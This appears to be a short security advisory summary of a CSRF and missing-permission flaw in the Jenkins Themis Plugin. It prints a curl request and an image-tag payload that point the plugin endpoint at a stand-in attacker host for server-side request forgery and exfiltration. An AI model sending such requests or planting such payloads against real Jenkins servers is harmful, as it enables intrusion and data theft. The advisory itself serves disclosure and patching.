Listen to this Post
The CVE in the Jenkins Themis Plugin stems from a missing permission check and CSRF protection in a specific HTTP endpoint. Versions 1.4.1 and earlier fail to verify if a user has the necessary permissions beyond Overall/Read when processing requests to this endpoint. This allows an attacker to craft a malicious web page that, when visited by an authenticated Jenkins user, sends a forged request to the vulnerable Themis Plugin endpoint. Since the endpoint does not require a POST request or a CSRF token, the attacker’s request is executed with the victim’s privileges, forcing the Jenkins instance to connect to an attacker-controlled server. This vulnerability chain combines insufficient authorization with a missing CSRF protection mechanism, enabling data exfiltration or server-side request forgery (SSRF) attacks.
Platform: Jenkins Plugin
Version: 1.4.1 and earlier
Vulnerability : CSRF & Authorization
Severity: Moderate
date: 2025-10-29
Prediction: 2025-11-12
What Undercode Say:
`curl -X GET ‘http://jenkins-host/jenkins/plugin/themis/endpoint?url=http://attacker-server’`
` Missing permission check in handler`
`if (user.hasPermission(Overall.READ)) { connectToURL(request.getParameter(“url”)); }`
How Exploit:
Malicious page with <img src="https://jenkins/plugin/themis/endpoint?url=http://attacker/exfil">.
Protection from this CVE:
Apply plugin update. Use security plugins. Require POST requests.
Impact:
Server-Side Request Forgery. Data exfiltration. Unauthorized connections.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
